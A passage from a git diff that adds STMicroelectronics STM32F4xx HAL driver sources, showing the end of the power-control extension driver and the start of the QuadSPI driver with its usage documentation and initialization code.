1 mode, + * the maximum value of fHCLK is 168 MHz. It can be extended to + * 180 MHz by activating the over-drive mode. + * @arg PWR_REGULATOR_VOLTAGE_SCALE2: Regulator voltage output range 2 mode, + * the maximum value of fHCLK is 144 MHz. It can be extended to, + * 168 MHz by activating the over-drive mode. + * @arg PWR_REGULATOR_VOLTAGE_SCALE3: Regulator voltage output range 3 mode, + * the maximum value of fHCLK is 120 MHz. + * @note To update the system clock frequency(SYSCLK): + * - Set the HSI or HSE as system clock frequency using the HAL_RCC_ClockConfig(). + * - Call the HAL_RCC_OscConfig() to configure the PLL. + * - Call HAL_PWREx_ConfigVoltageScaling() API to adjust the voltage scale. + * - Set the new system clock frequency using the HAL_RCC_ClockConfig(). + * @note The scale can be modified only when the HSI or HSE clock source is selected + * as system clock source, otherwise the API returns HAL_ERROR. + * @note When the PLL is OFF, the voltage scale 3 is automatically selected and the VOS bits + * value in the PWR_CR1 register are not taken in account. + * @note This API forces the PLL state ON to allow the possibility to configure the voltage scale 1 or 2. + * @note The new voltage scale is active only when the PLL is ON. + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_PWREx_ControlVoltageScaling(uint32_t VoltageScaling) +{ + uint32_t tickstart = 0U; + + assert_param(IS_PWR_VOLTAGE_SCALING_RANGE(VoltageScaling)); + + /* Enable PWR RCC Clock Peripheral */ + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Check if the PLL is used as system clock or not */ + if(__HAL_RCC_GET_SYSCLK_SOURCE() != RCC_CFGR_SWS_PLL) + { + /* Disable the main PLL */ + __HAL_RCC_PLL_DISABLE(); + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + /* Wait till PLL is disabled */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Set Range */ + __HAL_PWR_VOLTAGESCALING_CONFIG(VoltageScaling); + + /* Enable the main PLL */ + __HAL_RCC_PLL_ENABLE(); + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + /* Wait till PLL is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + while((__HAL_PWR_GET_FLAG(PWR_FLAG_VOSRDY) == RESET)) + { + if((HAL_GetTick() - tickstart ) > PWR_VOSRDY_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + return HAL_ERROR; + } + + return HAL_OK; +} +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx */ + +#if defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) ||\ + defined(STM32F411xE) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) ||\ + defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Enables Main Regulator low voltage mode. + * @note This mode is only available for STM32F401xx/STM32F410xx/STM32F411xx/STM32F412Zx/STM32F412Rx/STM32F412Vx/STM32F412Cx/ + * STM32F413xx/STM32F423xx devices. + * @retval None + */ +void HAL_PWREx_EnableMainRegulatorLowVoltage(void) +{ + *(__IO uint32_t *) CR_MRLVDS_BB = (uint32_t)ENABLE; +} + +/** + * @brief Disables Main Regulator low voltage mode. + * @note This mode is only available for STM32F401xx/STM32F410xx/STM32F411xx/STM32F412Zx/STM32F412Rx/STM32F412Vx/STM32F412Cx/ + * STM32F413xx/STM32F423xxdevices. + * @retval None + */ +void HAL_PWREx_DisableMainRegulatorLowVoltage(void) +{ + *(__IO uint32_t *) CR_MRLVDS_BB = (uint32_t)DISABLE; +} + +/** + * @brief Enables Low Power Regulator low voltage mode. + * @note This mode is only available for STM32F401xx/STM32F410xx/STM32F411xx/STM32F412Zx/STM32F412Rx/STM32F412Vx/STM32F412Cx/ + * STM32F413xx/STM32F423xx devices. + * @retval None + */ +void HAL_PWREx_EnableLowRegulatorLowVoltage(void) +{ + *(__IO uint32_t *) CR_LPLVDS_BB = (uint32_t)ENABLE; +} + +/** + * @brief Disables Low Power Regulator low voltage mode. + * @note This mode is only available for STM32F401xx/STM32F410xx/STM32F411xx/STM32F412Zx/STM32F412Rx/STM32F412Vx/STM32F412Cx/ + * STM32F413xx/STM32F423xx devices. + * @retval None + */ +void HAL_PWREx_DisableLowRegulatorLowVoltage(void) +{ + *(__IO uint32_t *) CR_LPLVDS_BB = (uint32_t)DISABLE; +} + +#endif /* STM32F401xC || STM32F401xE || STM32F410xx || STM32F411xE || STM32F412Zx || STM32F412Rx || STM32F412Vx || STM32F412Cx || + STM32F413xx || STM32F423xx */ + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) +/** + * @brief Activates the Over-Drive mode. + * @note This function can be used only for STM32F42xx/STM32F43xx/STM32F446xx/STM32F469xx/STM32F479xx devices. + * This mode allows the CPU and the core logic to operate at a higher frequency + * than the normal mode for a given voltage scaling (scale 1, scale 2 or scale 3). + * @note It is recommended to enter or exit Over-drive mode when the application is not running + * critical tasks and when the system clock source is either HSI or HSE. + * During the Over-drive switch activation, no peripheral clocks should be enabled. + * The peripheral clocks must be enabled once the Over-drive mode is activated. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PWREx_EnableOverDrive(void) +{ + uint32_t tickstart = 0U; + + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Enable the Over-drive to extend the clock frequency to 180 Mhz */ + __HAL_PWR_OVERDRIVE_ENABLE(); + + /* Get tick */ + tickstart = HAL_GetTick(); + + while(!__HAL_PWR_GET_FLAG(PWR_FLAG_ODRDY)) + { + if((HAL_GetTick() - tickstart) > PWR_OVERDRIVE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Enable the Over-drive switch */ + __HAL_PWR_OVERDRIVESWITCHING_ENABLE(); + + /* Get tick */ + tickstart = HAL_GetTick(); + + while(!__HAL_PWR_GET_FLAG(PWR_FLAG_ODSWRDY)) + { + if((HAL_GetTick() - tickstart ) > PWR_OVERDRIVE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + return HAL_OK; +} + +/** + * @brief Deactivates the Over-Drive mode. + * @note This function can be used only for STM32F42xx/STM32F43xx/STM32F446xx/STM32F469xx/STM32F479xx devices. + * This mode allows the CPU and the core logic to operate at a higher frequency + * than the normal mode for a given voltage scaling (scale 1, scale 2 or scale 3). + * @note It is recommended to enter or exit Over-drive mode when the application is not running + * critical tasks and when the system clock source is either HSI or HSE. + * During the Over-drive switch activation, no peripheral clocks should be enabled. + * The peripheral clocks must be enabled once the Over-drive mode is activated. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PWREx_DisableOverDrive(void) +{ + uint32_t tickstart = 0U; + + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Disable the Over-drive switch */ + __HAL_PWR_OVERDRIVESWITCHING_DISABLE(); + + /* Get tick */ + tickstart = HAL_GetTick(); + + while(__HAL_PWR_GET_FLAG(PWR_FLAG_ODSWRDY)) + { + if((HAL_GetTick() - tickstart) > PWR_OVERDRIVE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Disable the Over-drive */ + __HAL_PWR_OVERDRIVE_DISABLE(); + + /* Get tick */ + tickstart = HAL_GetTick(); + + while(__HAL_PWR_GET_FLAG(PWR_FLAG_ODRDY)) + { + if((HAL_GetTick() - tickstart) > PWR_OVERDRIVE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + return HAL_OK; +} + +/** + * @brief Enters in Under-Drive STOP mode. + * + * @note This mode is only available for STM32F42xxx/STM32F43xxx/STM32F446xx/STM32F469xx/STM32F479xx devices. + * + * @note This mode can be selected only when the Under-Drive is already active + * + * @note This mode is enabled only with STOP low power mode. + * In this mode, the 1.2V domain is preserved in reduced leakage mode. This + * mode is only available when the main regulator or the low power regulator + * is in low voltage mode + * + * @note If the Under-drive mode was enabled, it is automatically disabled after + * exiting Stop mode. + * When the voltage regulator operates in Under-drive mode, an additional + * startup delay is induced when waking up from Stop mode. + * + * @note In Stop mode, all I/O pins keep the same state as in Run mode. + * + * @note When exiting Stop mode by issuing an interrupt or a wake-up event, + * the HSI RC oscillator is selected as system clock. + * + * @note When the voltage regulator operates in low power mode, an additional + * startup delay is incurred when waking up from Stop mode. + * By keeping the internal regulator ON during Stop mode, the consumption + * is higher although the startup time is reduced. + * + * @param Regulator specifies the regulator state in STOP mode. + * This parameter can be one of the following values: + * @arg PWR_MAINREGULATOR_UNDERDRIVE_ON: Main Regulator in under-drive mode + * and Flash memory in power-down when the device is in Stop under-drive mode + * @arg PWR_LOWPOWERREGULATOR_UNDERDRIVE_ON: Low Power Regulator in under-drive mode + * and Flash memory in power-down when the device is in Stop under-drive mode + * @param STOPEntry specifies if STOP mode in entered with WFI or WFE instruction. + * This parameter can be one of the following values: + * @arg PWR_SLEEPENTRY_WFI: enter STOP mode with WFI instruction + * @arg PWR_SLEEPENTRY_WFE: enter STOP mode with WFE instruction + * @retval None + */ +HAL_StatusTypeDef HAL_PWREx_EnterUnderDriveSTOPMode(uint32_t Regulator, uint8_t STOPEntry) +{ + uint32_t tmpreg1 = 0U; + + /* Check the parameters */ + assert_param(IS_PWR_REGULATOR_UNDERDRIVE(Regulator)); + assert_param(IS_PWR_STOP_ENTRY(STOPEntry)); + + /* Enable Power ctrl clock */ + __HAL_RCC_PWR_CLK_ENABLE(); + /* Enable the Under-drive Mode ---------------------------------------------*/ + /* Clear Under-drive flag */ + __HAL_PWR_CLEAR_ODRUDR_FLAG(); + + /* Enable the Under-drive */ + __HAL_PWR_UNDERDRIVE_ENABLE(); + + /* Select the regulator state in STOP mode ---------------------------------*/ + tmpreg1 = PWR->CR; + /* Clear PDDS, LPDS, MRLUDS and LPLUDS bits */ + tmpreg1 &= (uint32_t)~(PWR_CR_PDDS | PWR_CR_LPDS | PWR_CR_LPUDS | PWR_CR_MRUDS); + + /* Set LPDS, MRLUDS and LPLUDS bits according to PWR_Regulator value */ + tmpreg1 |= Regulator; + + /* Store the new value */ + PWR->CR = tmpreg1; + + /* Set SLEEPDEEP bit of Cortex System Control Register */ + SCB->SCR |= SCB_SCR_SLEEPDEEP_Msk; + + /* Select STOP mode entry --------------------------------------------------*/ + if(STOPEntry == PWR_SLEEPENTRY_WFI) + { + /* Request Wait For Interrupt */ + __WFI(); + } + else + { + /* Request Wait For Event */ + __WFE(); + } + /* Reset SLEEPDEEP bit of Cortex System Control Register */ + SCB->SCR &= (uint32_t)~((uint32_t)SCB_SCR_SLEEPDEEP_Msk); + + return HAL_OK; +} + +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx || STM32F479xx */ +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_PWR_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_qspi.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_qspi.c new file mode 100644 index 000000000..5763d0775 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_qspi.c @@ -0,0 +1,2903 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_qspi.c + * @author MCD Application Team + * @brief QSPI HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the QuadSPI interface (QSPI). + * + Initialization and de-initialization functions + * + Indirect functional mode management + * + Memory-mapped functional mode management + * + Auto-polling functional mode management + * + Interrupts and flags management + * + DMA channel configuration for indirect functional mode + * + Errors management and abort functionality + * + * + @verbatim + =============================================================================== + ##### How to use this driver ##### + =============================================================================== + [..] + *** Initialization *** + ====================== + [..] + (#) As prerequisite, fill in the HAL_QSPI_MspInit() : + (++) Enable QuadSPI clock interface with __HAL_RCC_QSPI_CLK_ENABLE(). + (++) Reset QuadSPI Peripheral with __HAL_RCC_QSPI_FORCE_RESET() and __HAL_RCC_QSPI_RELEASE_RESET(). + (++) Enable the clocks for the QuadSPI GPIOS with __HAL_RCC_GPIOx_CLK_ENABLE(). + (++) Configure these QuadSPI pins in alternate mode using HAL_GPIO_Init(). + (++) If interrupt mode is used, enable and configure QuadSPI global + interrupt with HAL_NVIC_SetPriority() and HAL_NVIC_EnableIRQ(). + (++) If DMA mode is used, enable the clocks for the QuadSPI DMA channel + with __HAL_RCC_DMAx_CLK_ENABLE(), configure DMA with HAL_DMA_Init(), + link it with QuadSPI handle using __HAL_LINKDMA(), enable and configure + DMA channel global interrupt with HAL_NVIC_SetPriority() and HAL_NVIC_EnableIRQ(). + (#) Configure the flash size, the clock prescaler, the fifo threshold, the + clock mode, the sample shifting and the CS high time using the HAL_QSPI_Init() function. + + *** Indirect functional mode *** + ================================ + [..] + (#) Configure the command sequence using the HAL_QSPI_Command() or HAL_QSPI_Command_IT() + functions : + (++) Instruction phase : the mode used and if present the instruction opcode. + (++) Address phase : the mode used and if present the size and the address value. + (++) Alternate-bytes phase : the mode used and if present the size and the alternate + bytes values. + (++) Dummy-cycles phase : the number of dummy cycles (mode used is same as data phase). + (++) Data phase : the mode used and if present the number of bytes. + (++) Double Data Rate (DDR) mode : the activation (or not) of this mode and the delay + if activated. + (++) Sending Instruction Only Once (SIOO) mode : the activation (or not) of this mode. + (#) If no data is required for the command, it is sent directly to the memory : + (++) In polling mode, the output of the function is done when the transfer is complete. + (++) In interrupt mode, HAL_QSPI_CmdCpltCallback() will be called when the transfer is complete. + (#) For the indirect write mode, use HAL_QSPI_Transmit(), HAL_QSPI_Transmit_DMA() or + HAL_QSPI_Transmit_IT() after the command configuration : + (++) In polling mode, the output of the function is done when the transfer is complete. + (++) In interrupt mode, HAL_QSPI_FifoThresholdCallback() will be called when the fifo threshold + is reached and HAL_QSPI_TxCpltCallback() will be called when the transfer is complete. + (++) In DMA mode, HAL_QSPI_TxHalfCpltCallback() will be called at the half transfer and + HAL_QSPI_TxCpltCallback() will be called when the transfer is complete. + (#) For the indirect read mode, use HAL_QSPI_Receive(), HAL_QSPI_Receive_DMA() or + HAL_QSPI_Receive_IT() after the command configuration : + (++) In polling mode, the output of the function is done when the transfer is complete. + (++) In interrupt mode, HAL_QSPI_FifoThresholdCallback() will be called when the fifo threshold + is reached and HAL_QSPI_RxCpltCallback() will be called when the transfer is complete. + (++) In DMA mode, HAL_QSPI_RxHalfCpltCallback() will be called at the half transfer and + HAL_QSPI_RxCpltCallback() will be called when the transfer is complete. + + *** Auto-polling functional mode *** + ==================================== + [..] + (#) Configure the command sequence and the auto-polling functional mode using the + HAL_QSPI_AutoPolling() or HAL_QSPI_AutoPolling_IT() functions : + (++) Instruction phase : the mode used and if present the instruction opcode. + (++) Address phase : the mode used and if present the size and the address value. + (++) Alternate-bytes phase : the mode used and if present the size and the alternate + bytes values. + (++) Dummy-cycles phase : the number of dummy cycles (mode used is same as data phase). + (++) Data phase : the mode used. + (++) Double Data Rate (DDR) mode : the activation (or not) of this mode and the delay + if activated. + (++) Sending Instruction Only Once (SIOO) mode : the activation (or not) of this mode. + (++) The size of the status bytes, the match value, the mask used, the match mode (OR/AND), + the polling interval and the automatic stop activation. + (#) After the configuration : + (++) In polling mode, the output of the function is done when the status match is reached. The + automatic stop is activated to avoid an infinite loop. + (++) In interrupt mode, HAL_QSPI_StatusMatchCallback() will be called each time the status match is reached. + + *** Memory-mapped functional mode *** + ===================================== + [..] + (#) Configure the command sequence and the memory-mapped functional mode using the + HAL_QSPI_MemoryMapped() functions : + (++) Instruction phase : the mode used and if present the instruction opcode. + (++) Address phase : the mode used and the size. + (++) Alternate-bytes phase : the mode used and if present the size and the alternate + bytes values. + (++) Dummy-cycles phase : the number of dummy cycles (mode used is same as data phase). + (++) Data phase : the mode used. + (++) Double Data Rate (DDR) mode : the activation (or not) of this mode and the delay + if activated. + (++) Sending Instruction Only Once (SIOO) mode : the activation (or not) of this mode. + (++) The timeout activation and the timeout period. + (#) After the configuration, the QuadSPI will be used as soon as an access on the AHB is done on + the address range. HAL_QSPI_TimeOutCallback() will be called when the timeout expires. + + *** Errors management and abort functionality *** + ================================================= + [..] + (#) HAL_QSPI_GetError() function gives the error raised during the last operation. + (#) HAL_QSPI_Abort() and HAL_QSPI_AbortIT() functions aborts any on-going operation and + flushes the fifo : + (++) In polling mode, the output of the function is done when the transfer + complete bit is set and the busy bit cleared. + (++) In interrupt mode, HAL_QSPI_AbortCpltCallback() will be called when + the transfer complete bit is set. + + *** Control functions *** + ========================= + [..] + (#) HAL_QSPI_GetState() function gives the current state of the HAL QuadSPI driver. + (#) HAL_QSPI_SetTimeout() function configures the timeout value used in the driver. + (#) HAL_QSPI_SetFifoThreshold() function configures the threshold on the Fifo of the QSPI IP. + (#) HAL_QSPI_GetFifoThreshold() function gives the current of the Fifo's threshold + (#) HAL_QSPI_SetFlashID() function configures the index of the flash memory to be accessed. + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_QSPI_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions HAL_QSPI_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) ErrorCallback : callback when error occurs. + (+) AbortCpltCallback : callback when abort is completed. + (+) FifoThresholdCallback : callback when the fifo threshold is reached. + (+) CmdCpltCallback : callback when a command without data is completed. + (+) RxCpltCallback : callback when a reception transfer is completed. + (+) TxCpltCallback : callback when a transmission transfer is completed. + (+) RxHalfCpltCallback : callback when half of the reception transfer is completed. + (+) TxHalfCpltCallback : callback when half of the transmission transfer is completed. + (+) StatusMatchCallback : callback when a status match occurs. + (+) TimeOutCallback : callback when the timeout perioed expires. + (+) MspInitCallback : QSPI MspInit. + (+) MspDeInitCallback : QSPI MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function HAL_QSPI_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) ErrorCallback : callback when error occurs. + (+) AbortCpltCallback : callback when abort is completed. + (+) FifoThresholdCallback : callback when the fifo threshold is reached. + (+) CmdCpltCallback : callback when a command without data is completed. + (+) RxCpltCallback : callback when a reception transfer is completed. + (+) TxCpltCallback : callback when a transmission transfer is completed. + (+) RxHalfCpltCallback : callback when half of the reception transfer is completed. + (+) TxHalfCpltCallback : callback when half of the transmission transfer is completed. + (+) StatusMatchCallback : callback when a status match occurs. + (+) TimeOutCallback : callback when the timeout perioed expires. + (+) MspInitCallback : QSPI MspInit. + (+) MspDeInitCallback : QSPI MspDeInit. + This function) takes as parameters the HAL peripheral handle and the Callback ID. + + By default, after the HAL_QSPI_Init and if the state is HAL_QSPI_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the HAL_QSPI_Init + and HAL_QSPI_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_QSPI_Init and HAL_QSPI_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_QSPI_RegisterCallback before calling HAL_QSPI_DeInit + or HAL_QSPI_Init function. + + When The compilation define USE_HAL_QSPI_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + *** Workarounds linked to Silicon Limitation *** + ==================================================== + [..] + (#) Workarounds Implemented inside HAL Driver + (++) Extra data written in the FIFO at the end of a read transfer + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +#if defined(QUADSPI) + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup QSPI QSPI + * @brief QSPI HAL module driver + * @{ + */ +#ifdef HAL_QSPI_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ + +/* Private define ------------------------------------------------------------*/ +/** @defgroup QSPI_Private_Constants QSPI Private Constants + * @{ + */ +#define QSPI_FUNCTIONAL_MODE_INDIRECT_WRITE 0x00000000U /*!Instance)); + assert_param(IS_QSPI_CLOCK_PRESCALER(hqspi->Init.ClockPrescaler)); + assert_param(IS_QSPI_FIFO_THRESHOLD(hqspi->Init.FifoThreshold)); + assert_param(IS_QSPI_SSHIFT(hqspi->Init.SampleShifting)); + assert_param(IS_QSPI_FLASH_SIZE(hqspi->Init.FlashSize)); + assert_param(IS_QSPI_CS_HIGH_TIME(hqspi->Init.ChipSelectHighTime)); + assert_param(IS_QSPI_CLOCK_MODE(hqspi->Init.ClockMode)); + assert_param(IS_QSPI_DUAL_FLASH_MODE(hqspi->Init.DualFlash)); + + if (hqspi->Init.DualFlash != QSPI_DUALFLASH_ENABLE ) + { + assert_param(IS_QSPI_FLASH_ID(hqspi->Init.FlashID)); + } + + if(hqspi->State == HAL_QSPI_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hqspi->Lock = HAL_UNLOCKED; + +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + /* Reset Callback pointers in HAL_QSPI_STATE_RESET only */ + hqspi->ErrorCallback = HAL_QSPI_ErrorCallback; + hqspi->AbortCpltCallback = HAL_QSPI_AbortCpltCallback; + hqspi->FifoThresholdCallback = HAL_QSPI_FifoThresholdCallback; + hqspi->CmdCpltCallback = HAL_QSPI_CmdCpltCallback; + hqspi->RxCpltCallback = HAL_QSPI_RxCpltCallback; + hqspi->TxCpltCallback = HAL_QSPI_TxCpltCallback; + hqspi->RxHalfCpltCallback = HAL_QSPI_RxHalfCpltCallback; + hqspi->TxHalfCpltCallback = HAL_QSPI_TxHalfCpltCallback; + hqspi->StatusMatchCallback = HAL_QSPI_StatusMatchCallback; + hqspi->TimeOutCallback = HAL_QSPI_TimeOutCallback; + + if(hqspi->MspInitCallback == NULL) + { + hqspi->MspInitCallback = HAL_QSPI_MspInit; + } + + /* Init the low level hardware */ + hqspi->MspInitCallback(hqspi); +#else + /* Init the low level hardware : GPIO, CLOCK */ + HAL_QSPI_MspInit(hqspi); +#endif + + /* Configure the default timeout for the QSPI memory access */ + HAL_QSPI_SetTimeout(hqspi, HAL_QSPI_TIMEOUT_DEFAULT_VALUE); + } + + /* Configure QSPI FIFO Threshold */ + MODIFY_REG(hqspi->Instance->CR, QUADSPI_CR_FTHRES, + ((hqspi->Init.FifoThreshold - 1U) << QUADSPI_CR_FTHRES_Pos)); + + /* Wait till BUSY flag reset */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_BUSY, RESET, tickstart, hqspi->Timeout); + + if(status == HAL_OK) + { + /* Configure QSPI Clock Prescaler and Sample Shift */ + MODIFY_REG(hqspi->Instance->CR, (QUADSPI_CR_PRESCALER | QUADSPI_CR_SSHIFT | QUADSPI_CR_FSEL | QUADSPI_CR_DFM), + ((hqspi->Init.ClockPrescaler << QUADSPI_CR_PRESCALER_Pos) | + hqspi->Init.SampleShifting | hqspi->Init.FlashID | hqspi->Init.DualFlash)); + + /* Configure QSPI Flash Size, CS High Time and Clock Mode */ + MODIFY_REG(hqspi->Instance->DCR, (QUADSPI_DCR_FSIZE | QUADSPI_DCR_CSHT | QUADSPI_DCR_CKMODE), + ((hqspi->Init.FlashSize << QUADSPI_DCR_FSIZE_Pos) | + hqspi->Init.ChipSelectHighTime | hqspi->Init.ClockMode)); + + /* Enable the QSPI peripheral */ + __HAL_QSPI_ENABLE(hqspi); + + /* Set QSPI error code to none */ + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + /* Initialize the QSPI state */ + hqspi->State = HAL_QSPI_STATE_READY; + } + + /* Release Lock */ + __HAL_UNLOCK(hqspi); + + /* Return function status */ + return status; +} + +/** + * @brief De-Initialize the QSPI peripheral. + * @param hqspi : QSPI handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_DeInit(QSPI_HandleTypeDef *hqspi) +{ + /* Check the QSPI handle allocation */ + if(hqspi == NULL) + { + return HAL_ERROR; + } + + /* Disable the QSPI Peripheral Clock */ + __HAL_QSPI_DISABLE(hqspi); + +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + if(hqspi->MspDeInitCallback == NULL) + { + hqspi->MspDeInitCallback = HAL_QSPI_MspDeInit; + } + + /* DeInit the low level hardware */ + hqspi->MspDeInitCallback(hqspi); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC... */ + HAL_QSPI_MspDeInit(hqspi); +#endif + + /* Set QSPI error code to none */ + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + /* Initialize the QSPI state */ + hqspi->State = HAL_QSPI_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hqspi); + + return HAL_OK; +} + +/** + * @brief Initialize the QSPI MSP. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_MspInit(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_QSPI_MspInit can be implemented in the user file + */ +} + +/** + * @brief DeInitialize the QSPI MSP. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_MspDeInit(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_QSPI_MspDeInit can be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup QSPI_Exported_Functions_Group2 Input and Output operation functions + * @brief QSPI Transmit/Receive functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to : + (+) Handle the interrupts. + (+) Handle the command sequence. + (+) Transmit data in blocking, interrupt or DMA mode. + (+) Receive data in blocking, interrupt or DMA mode. + (+) Manage the auto-polling functional mode. + (+) Manage the memory-mapped functional mode. + +@endverbatim + * @{ + */ + +/** + * @brief Handle QSPI interrupt request. + * @param hqspi : QSPI handle + * @retval None + */ +void HAL_QSPI_IRQHandler(QSPI_HandleTypeDef *hqspi) +{ + __IO uint32_t *data_reg; + uint32_t flag = READ_REG(hqspi->Instance->SR); + uint32_t itsource = READ_REG(hqspi->Instance->CR); + + /* QSPI Fifo Threshold interrupt occurred ----------------------------------*/ + if(((flag & QSPI_FLAG_FT) != 0U) && ((itsource & QSPI_IT_FT) != 0U)) + { + data_reg = &hqspi->Instance->DR; + + if(hqspi->State == HAL_QSPI_STATE_BUSY_INDIRECT_TX) + { + /* Transmission process */ + while(__HAL_QSPI_GET_FLAG(hqspi, QSPI_FLAG_FT) != RESET) + { + if (hqspi->TxXferCount > 0U) + { + /* Fill the FIFO until the threshold is reached */ + *((__IO uint8_t *)data_reg) = *hqspi->pTxBuffPtr; + hqspi->pTxBuffPtr++; + hqspi->TxXferCount--; + } + else + { + /* No more data available for the transfer */ + /* Disable the QSPI FIFO Threshold Interrupt */ + __HAL_QSPI_DISABLE_IT(hqspi, QSPI_IT_FT); + break; + } + } + } + else if(hqspi->State == HAL_QSPI_STATE_BUSY_INDIRECT_RX) + { + /* Receiving Process */ + while(__HAL_QSPI_GET_FLAG(hqspi, QSPI_FLAG_FT) != RESET) + { + if (hqspi->RxXferCount > 0U) + { + /* Read the FIFO until the threshold is reached */ + *hqspi->pRxBuffPtr = *((__IO uint8_t *)data_reg); + hqspi->pRxBuffPtr++; + hqspi->RxXferCount--; + } + else + { + /* All data have been received for the transfer */ + /* Disable the QSPI FIFO Threshold Interrupt */ + __HAL_QSPI_DISABLE_IT(hqspi, QSPI_IT_FT); + break; + } + } + } + else + { + /* Nothing to do */ + } + + /* FIFO Threshold callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->FifoThresholdCallback(hqspi); +#else + HAL_QSPI_FifoThresholdCallback(hqspi); +#endif + } + + /* QSPI Transfer Complete interrupt occurred -------------------------------*/ + else if(((flag & QSPI_FLAG_TC) != 0U) && ((itsource & QSPI_IT_TC) != 0U)) + { + /* Clear interrupt */ + WRITE_REG(hqspi->Instance->FCR, QSPI_FLAG_TC); + + /* Disable the QSPI FIFO Threshold, Transfer Error and Transfer complete Interrupts */ + __HAL_QSPI_DISABLE_IT(hqspi, QSPI_IT_TC | QSPI_IT_TE | QSPI_IT_FT); + + /* Transfer complete callback */ + if(hqspi->State == HAL_QSPI_STATE_BUSY_INDIRECT_TX) + { + if ((hqspi->Instance->CR & QUADSPI_CR_DMAEN) != 0U) + { + /* Disable the DMA transfer by clearing the DMAEN bit in the QSPI CR register */ + CLEAR_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + + /* Disable the DMA channel */ + __HAL_DMA_DISABLE(hqspi->hdma); + } + + /* Clear Busy bit */ + HAL_QSPI_Abort_IT(hqspi); + + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + + /* TX Complete callback */ +#if 